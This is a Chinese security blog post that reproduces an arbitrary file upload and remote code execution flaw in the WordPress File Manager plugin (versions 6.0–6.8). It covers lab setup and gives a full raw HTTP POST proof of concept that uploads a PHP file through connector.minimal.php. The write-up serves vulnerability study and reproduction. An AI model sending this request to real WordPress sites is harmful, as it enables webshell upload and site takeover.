上方蓝色字体关注我们,一起学安全!

作者:daxi0ng&水木逸轩@Timeline Sec

本文字数:3591

阅读时长:10~12min

声明:请勿用作违法用途,否则后果自负

0x01 简介

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。

文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案!

0x02 漏洞概述

安全人员进行调查时,很快发现WordPress插件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程执行代码。

攻击者可能会做任何他们选择采取的行动–窃取私人数据,破坏站点或使用该网站对其他站点或基础结构进行进一步的攻击。

0x03 影响版本

File Manager 6.0-6.8

0x04 环境搭建

WordPress5.4.1下载地址

https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz

wp-file-manager6.0下载地址:

公众号内回复wordpress插件

用phpstudy搭建WordPress,安装插件

0x05 漏洞复现

POC:

POST /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

Content-Type: multipart/form-data; boundary=—————————402078532114344024151352374707

Content-Length: 465

Origin: http://127.0.0.1

Connection: close

Cookie: PHPSESSID=184sec57d1sltqv23haagn3574;

—————————–402078532114344024151352374707

Content-Disposition: form-data; name=”upload[0]”; filename=”1.php”

Content-Type: image/jpeg

123213123

—————————–402078532114344024151352374707

Content-Disposition: form-data; name=”cmd”

upload

—————————–402078532114344024151352374707

Content-Disposition: form-data; name=”target”

l1_Lw==

—————————–402078532114344024151352374707–